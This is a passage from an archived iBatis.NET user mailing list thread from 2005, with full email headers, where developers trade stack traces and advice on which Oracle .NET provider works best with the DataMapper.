<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.MappedStatements.MappedSta= tement.ExecuteQueryForList(IDalSession session, Object<br>parameterObject, = Int32 skipResults, Int32 maxResults)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.D= ataMapper.MappedStatements.MappedStatement.ExecuteQueryForList (IDalSession session, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;IB= atisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object para= meterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.DAL.USERSDB.SelectFilter(U= SERSDB_Filter filter) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_c= ode\dal\man\usersdb.cs:103 <br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.Pages.ifPlayListen.Page_Load(Object se= nder, EventArgs e) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_code= \pages\playlisten\ifplaylisten.aspx.cs:41<br><br><br>with<br>&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;add key=3D&quot;provider&quot; value= =3D&quot; oracleClient1.0&quot; /&gt;<br><br>i get<br><br>[Exception: Parameter 'para= m0': No size set for variable length data type: String.]<br>&nbsp;&nbsp;&nb= sp;&nbsp;System.Data.OracleClient.OracleParameterBinding.PrepareForBind(Ora= cleConnection connection, Int32&amp; offset) +720 <br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleCommand.Execute(= OciHandle statementHandle, CommandBehavior behavior, Boolean<br>isReader, B= oolean needRowid, OciHandle&amp; rowidDescriptor, ArrayList&amp; refCursorP= arameterOrdinals) +1919 <br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleCommand.Execute(= OciHandle statementHandle, CommandBehavior behavior, ArrayList&amp;<br>refC= ursorParameterOrdinals) +28<br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleCl= ient.OracleCommand.ExecuteReader(CommandBehavior behavior) +272 <br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleCommand.ExecuteR= eader() +7<br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleComman= d.System.Data.IDbCommand.ExecuteReader() +5<br>&nbsp;&nbsp;&nbsp;&nbsp;IBat= isNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList (RequestScope request, IDalSession session,<br>Object parameterObject, Int3= 2 skipResults, Int32 maxResults, RowDelegate rowDelegate)<br>&nbsp;&nbsp;&n= bsp;&nbsp;IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQuer= yForList(IDalSession session, Object <br>parameterObject, Int32 skipResults, Int32 maxResults)<br>&nbsp;&nbsp;&n= bsp;&nbsp;IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQuer= yForList(IDalSession session, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;= &nbsp;IBatisNet.DataMapper.SqlMapper.QueryForList (String statementName, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;M= MServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in<br>e:\projektewe= b\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103<br>&nbsp;&nbsp= ;&nbsp;&nbsp;MMServer.Pages.ifPlayListen.Page_Load (Object sender, EventArgs e) in<br>e:\projekteweb\lft\medienmanager\mmserve= r\app_code\pages\playlisten\ifplaylisten.aspx.cs:43<br><br><br><br><br>If i= change the condition to<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&lt;isNotEqual prepend=3D&quot;AND&quot; property=3D&quot;LOGIN&quot; compareValue=3D&quot= ;&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LOGIN like #LOGIN#<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&lt;/isNotEqual&gt;<br><br>i get<br><br>[DataMapperException: Err= or comparing in conditional fragment.&nbsp;&nbsp;Uknown 'compare to' values= .]<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynami= c.Handlers.ConditionalTagHandler.Compare (SqlTagContext ctx, SqlTag<br>sqlTag, Object parameterObject)<br>&nbsp;&nbs= p;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsEqu= alTagHandler.IsCondition(SqlTagContext ctx, SqlTag tag,<br>Object parameter= Object)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.D= ynamic.Handlers.IsNotEqualTagHandler.IsCondition (SqlTagContext ctx, SqlTag<br>tag, Object parameterObject)<br>&nbsp;&nbsp;&= nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.Conditio= nalTagHandler.DoStartFragment(SqlTagContext ctx,<br>SqlTag tag, Object para= meterObject)<br> &nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Dyna= micSql.ProcessBodyChildren(RequestScope request, SqlTagContext<br>ctx, Obje= ct parameterObject, IEnumerator localChildren, StringBuilder buffer)<br>&nb= sp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Dynamic= Sql.ProcessBodyChildren (RequestScope request, SqlTagContext<br>ctx, Object parameterObject, IEnume= rator localChildren, StringBuilder buffer)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBati= sNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(Re= questScope request, SqlTagContext <br>ctx, Object parameterObject, IList localChildren)<br>&nbsp;&nbsp;&nbsp;= &nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.Process(Req= uestScope request, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBati= sNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.GetRequestScope (Object parameterObject, IDalSession session)<br>&nbsp;&nbsp;&nbsp;&nbsp;IB= atisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDa= lSession session, Object<br>parameterObject, Int32 skipResults, Int32 maxRe= sults)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.MappedStatements.Map= pedStatement.ExecuteQueryForList (IDalSession session, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;IB= atisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object para= meterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.DAL.USERSDB.SelectFilter(U= SERSDB_Filter filter) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_c= ode\dal\man\usersdb.cs:103 <br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.Pages.ifPlayListen.Page_Load(Object se= nder, EventArgs e) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_code= \pages\playlisten\ifplaylisten.aspx.cs:43<br><br><br><br><br>&gt; too encou= ntered some early on, specifically with respect to default type <br>&gt; conversion of certain sizes of oracle number fields, and might be = able<br>&gt; to point you in the right direction.<br>&gt;<br>&gt; Jeremy Gr= ay<br><br><br>&lt;snip&gt;<br><br>&gt; I like to ask:<br>&gt;<br>&gt; Which= seems to be the best Oracle provider to work with the ibatis <br>&gt; DataMapper 1.2 ( latest SVN version ) ?<br>&gt;<br>&gt; Background= : I get different TypeExceptions on different columntypes on<br>&gt; differ= ent providers.<br><br>--<br><br>Kind regards<br><br>Uwe<br>Lesta at SBS-Sof= twaresysteme.de <br><br><br></blockquote></div><br> ------=_Part_2633_17494571.1133548487937-- From [email protected] Mon Dec 05 22:10:51 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16845 invoked from network); 5 Dec 2005 22:10:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Dec 2005 22:10:50 -0000 Received: (qmail 24581 invoked by uid 500); 5 Dec 2005 22:10:39 -0000 Delivered-To: [email protected] Received: (qmail 23637 invoked by uid 500); 5 Dec 2005 22:10:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23471 invoked by uid 99); 5 Dec 2005 22:10:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 14:10:30 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cmxrly02.futureshop.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 14:09:45 -0800 Received: from cmxrly02.futureshop.com (localhost [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB5M1jB3004884 for <[email protected]>; Mon, 5 Dec 2005 14:01:45 -0800 (PST) Received: (from root@localhost) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.8/Submit) id jB5M1iJ5004883 for [email protected]; Mon, 5 Dec 2005 14:01:44 -0800 (PST) Received: from CPREXN100.itdmis02.futureshop.com (cprexn100 [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB5M1eB7004816 for <[email protected]>; Mon, 5 Dec 2005 14:01:44 -0800 (PST) Received: from CPREXN020-EVS.itdmis02.futureshop.com ([161.129.204.104]) by CPREXN100.itdmis02.futureshop.com with Microsoft SMTPSVC(6.0.3790.211); Mon, 5 Dec 2005 14:09:14 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: RE: Oracle provider with iBatis dataMapper 1.2 Date: Mon, 5 Dec 2005 14:09:21 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Oracle provider with iBatis dataMapper 1.2 Thread-Index: AcX3MBbTzxRtjIqvR+yfTMthvnVB/ACt8YgQ From: "Jeremy Gray" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 05 Dec 2005 22:09:14.0613 (UTC) FILETIME=[87362A50:01C5F9E8] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by cmxrly02.futureshop.com id jB5M1eB7004816 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Based on a quick look at the exception, it looks like you've run into the same issue we did, which is that the provider you are using has difficulties mapping the larger Oracle number types into the .net types. At the time that we encountered this issue we were only in a position to evaluate the Oracle 9i client and the Microsoft client. Since the Oracle 9i client performed markedly better, we worked around the problem by modifying our query statements to cast such problematic number fields to varchar and allow ibatis.net to map those back into the desired .net numeric types. We still have yet to evaluate the 10g client, but I'd like to get to it sometime soon. In the meantime, these workarounds have been rare, so there's not been much need to push towards the 10g client, as much as I might like to dig into it. Jeremy Gray -----Original Message----- From: Uwe Lesta [mailto:[email protected]] Sent: Friday, December 02, 2005 3:02 AM To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 Befor i dig into some solution i like to ask my question with other words: Which Oracle provider is best tested and is advised by the iBatis comunety ? Jeremy Gray wrote: > Can you provide any details regarding the exceptions you are seeing? We sure my test query is : <select id="SelectFilter" parameterClass="MMServer.DAL.USERSDB_Filter" resultMap="USERSSelectResult" > SELECT ID, LOGIN, FIRSTNAME, LASTNAME, ROLE_ID, ORG_ID, REMARK, EXPIRES, MODIFIED, DISABLED, ACTIVE FROM USERS <dynamic prepend="WHERE"> <isNotNull prepend="AND" property="LOGIN"> LOGIN like #LOGIN# </isNotNull> <isGreaterThan prepend="AND" property="ACTIVE" compareValue="-1"> ACTIVE = #ACTIVE# </isGreaterThan> </dynamic> </select> with <add key="provider" value="oracle10.1" /> i get [OracleTypeException: Numerische Stellenangabe liegt außerhalb des gültigen Bereiches (1 - 38)] Oracle.DataAccess.Types.OracleDecimal.ConvertToPrecScale(OracleDecimal value1, Int32 precision, Int32 scale) +667 Oracle.DataAccess.Client.OracleParameter.PreBind_Decimal() +3956 Oracle.DataAccess.Client.OracleParameter.PreBind(OracleConnection conn, IntPtr errCtx, Int32 arraySize) +132 Oracle.DataAccess.Client.OracleCommand.ExecuteReader(Boolean requery, Boolean fillRequest, CommandBehavior behavior) +2349 Oracle.DataAccess.Client.OracleCommand.ExecuteReader(Boolean requery, Boolean fillRequest, CommandBehavior behavior) +0 Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteReader() +81 Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteReader() +0 IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList(RequestScope request, IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegate rowDelegate) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject) IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object parameterObject) MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifplaylisten.aspx.cs:41 with <add key="provider" value="oracleClient1.0" /> i get [Exception: Parameter 'param0': No size set for variable length data type: String.] System.Data.OracleClient.OracleParameterBinding.PrepareForBind(OracleConnection connection, Int32& offset) +720 System.Data.OracleClient.OracleCommand.Execute(OciHandle statementHandle, CommandBehavior behavior, Boolean isReader, Boolean needRowid, OciHandle& rowidDescriptor, ArrayList& refCursorParameterOrdinals) +1919 System.Data.OracleClient.OracleCommand.Execute(OciHandle statementHandle, CommandBehavior behavior, ArrayList& refCursorParameterOrdinals) +28 System.Data.OracleClient.OracleCommand.ExecuteReader(CommandBehavior behavior) +272 System.Data.OracleClient.OracleCommand.ExecuteReader() +7 System.Data.OracleClient.OracleCommand.System.Data.IDbCommand.ExecuteReader() +5 IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList(RequestScope request, IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegate rowDelegate) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject) IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object parameterObject) MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifplaylisten.aspx.cs:43 If i change the condition to <isNotEqual prepend="AND" property="LOGIN" compareValue=""> LOGIN like #LOGIN# </isNotEqual> i get [DataMapperException: Error comparing in conditional fragment. Uknown 'compare to' values.] IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagHandler.Compare(SqlTagContext ctx, SqlTag sqlTag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsEqualTagHandler.IsCondition(SqlTagContext ctx, SqlTag tag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsNotEqualTagHandler.IsCondition(SqlTagContext ctx, SqlTag tag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagHandler.DoStartFragment(SqlTagContext ctx, SqlTag tag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(RequestScope request, SqlTagContext ctx, Object parameterObject, IEnumerator localChildren, StringBuilder buffer) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(RequestScope request, SqlTagContext ctx, Object parameterObject, IEnumerator localChildren, StringBuilder buffer) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(RequestScope request, SqlTagContext ctx, Object parameterObject, IList localChildren) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.Process(RequestScope request, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.GetRequestScope(Object parameterObject, IDalSession session) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject) IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object parameterObject) MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifplaylisten.aspx.cs:43 > too encountered some early on, specifically with respect to default type > conversion of certain sizes of oracle number fields, and might be able > to point you in the right direction. > > Jeremy Gray <snip> > I like to ask: > > Which seems to be the best Oracle provider to work with the ibatis > DataMapper 1.2 ( latest SVN version ) ? > > Background: I get different TypeExceptions on different columntypes on > different providers. -- Kind regards Uwe [email protected] From [email protected] Mon Dec 05 22:10:56 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17302 invoked from network); 5 Dec 2005 22:10:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Dec 2005 22:10:56 -0000 Received: (qmail 25128 invoked by uid 500); 5 Dec 2005 22:10:42 -0000 Delivered-To: [email protected] Received: (qmail 24999 invoked by uid 500); 5 Dec 2005 22:10:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24599 invoked by uid 99); 5 Dec 2005 22:10:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 14:10:39 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cmxrly02.futureshop.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 14:10:37 -0800 Received: from cmxrly02.futureshop.com (localhost [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB5M2aB3008023 for <[email protected]>; Mon, 5 Dec 2005 14:02:36 -0800 (PST) Received: (from root@localhost) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.8/Submit) id jB5M2a0E007961 for [email protected]; Mon, 5 Dec 2005 14:02:36 -0800 (PST) Received: from CPREXN100.itdmis02.futureshop.com (cprexn100 [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB5M2MBB007031 for <[email protected]>; Mon, 5 Dec 2005 14:02:34 -0800 (PST) Received: from CPREXN020-EVS.itdmis02.futureshop.com ([161.129.204.104]) by CPREXN100.itdmis02.futureshop.com with Microsoft SMTPSVC(6.0.3790.211); Mon, 5 Dec 2005 14:10:03 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C5F9E8.A46CBDAC" Subject: RE: Oracle provider with iBatis dataMapper 1.2 Date: Mon, 5 Dec 2005 14:10:10 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Oracle provider with iBatis dataMapper 1.2 Thread-Index: AcX3np1xvnkLm9gxSje6TziQpqDjGgCSfE1Q From: "Jeremy Gray" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 05 Dec 2005 22:10:03.0707 (UTC) FILETIME=[A47950B0:01C5F9E8] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C5F9E8.A46CBDAC Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Roberto, =20 Can you provide any specific insight into your recommendation against the 9i client? =20 Thanks in advance, =20 Jeremy Gray =20 ________________________________ From: Roberto R [mailto:[email protected]]=20 Sent: Friday, December 02, 2005 10:35 AM To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 =20 Tests were run for System.Data.OracleClient, ODP.NET 9i, and ODP.NET 10g. (I would not recommend using ODP.NET 9i with the DataMapper.) >From my experience, System.Data.OracleClient was the "easiest" to use right away, but ODP.NET 10g offers some advanced features that could be used outside of the DataMapper. =20 Roberto =20 ------_=_NextPart_001_01C5F9E8.A46CBDAC Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns:st1=3D"urn:schemas-microsoft-com:office:smarttags" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--><o:SmartTagType namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags" = name=3D"PersonName" downloadurl=3D"http://www.microsoft.com"/> <!--[if !mso]> <style> st1\:*{behavior:url(#default#ieooui) } </style> <![endif]--> <style> <!-- /* Font Definitions */ @font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:blue; text-decoration:underline;} span.EmailStyle18 {mso-style-type:personal-reply; font-family:Arial; color:navy;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dblue> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Roberto,<o:p></o:p></span></font></p= > <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Can you provide any specific = insight into your recommendation against the 9i client?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Thanks in = advance,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Jeremy = Gray<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p>&nbsp;</o:p></span></font></p> <div> <div class=3DMsoNormal align=3Dcenter style=3D'text-align:center'><font = size=3D3 face=3D"Times New Roman"><span style=3D'font-size:12.0pt'> <hr size=3D2 width=3D"100%" align=3Dcenter tabindex=3D-1> </span></font></div> <p class=3DMsoNormal><b><font size=3D2 face=3DTahoma><span = style=3D'font-size:10.0pt; font-family:Tahoma;font-weight:bold'>From:</span></font></b><font = size=3D2 face=3DTahoma><span style=3D'font-size:10.0pt;font-family:Tahoma'> = Roberto R [mailto:[email protected]] <br> <b><span style=3D'font-weight:bold'>Sent:</span></b> Friday, December = 02, 2005 10:35 AM<br> <b><span style=3D'font-weight:bold'>To:</span></b> <st1:PersonName = w:st=3D"on">[email protected]</st1:PersonName><br> <b><span style=3D'font-weight:bold'>Subject:</span></b> Re: Oracle = provider with iBatis dataMapper 1.2</span></font><o:p></o:p></p> </div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'margin-bottom:12.0pt'><font size=3D3 face=3D"Times New Roman"><span style=3D'font-size:12.0pt'>Tests were run = for System.Data.OracleClient, <a href=3D"http://ODP.NET">ODP.NET</a> 9i, and = <a href=3D"http://ODP.NET">ODP.NET</a> 10g.&nbsp; (I would not recommend = using <a href=3D"http://ODP.NET">ODP.NET</a> 9i with the DataMapper.)<br> <br> >From my experience, System.Data.OracleClient was the &quot;easiest&quot; = to use right away, but <a href=3D"http://ODP.NET">ODP.NET</a> 10g offers some = advanced features that could be used outside of the DataMapper.&nbsp; <br> <br> Roberto<br> <br> <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p>&nbsp;</o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C5F9E8.A46CBDAC-- From [email protected] Tue Dec 06 01:07:46 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91000 invoked from network); 6 Dec 2005 01:07:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Dec 2005 01:07:46 -0000 Received: (qmail 35992 invoked by uid 500); 6 Dec 2005 01:07:45 -0000 Delivered-To: [email protected] Received: (qmail 35954 invoked by uid 500); 6 Dec 2005 01:07:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35943 invoked by uid 99); 6 Dec 2005 01:07:45 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 17:07:45 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 17:07:44 -0800 Received: by wproxy.gmail.com with SMTP id 50so820994wri for <[email protected]>; Mon, 05 Dec 2005 17:07:23 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=cPH3r03TPOEU7i6Psr37lNEnjhhDMUp8RF/41vJFsItCd/RVBJbadorujcRoVkC8LY8lseWRthnG10c03tVCOpArd5bs9m2z02K15HLwBHXXzJhaOx4CPGdqjkhcceNXHx0nw120bDhi5yEeFLM3VQjjlua/oUlrbPvQO0RMgdI= Received: by 161.129.204.104 with SMTP id q12mr4926325wra; Mon, 05 Dec 2005 17:07:22 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 5 Dec 2005 17:07:22 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 5 Dec 2005 20:07:22 -0500 From: Roberto R <[email protected]> To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 In-Reply-To: 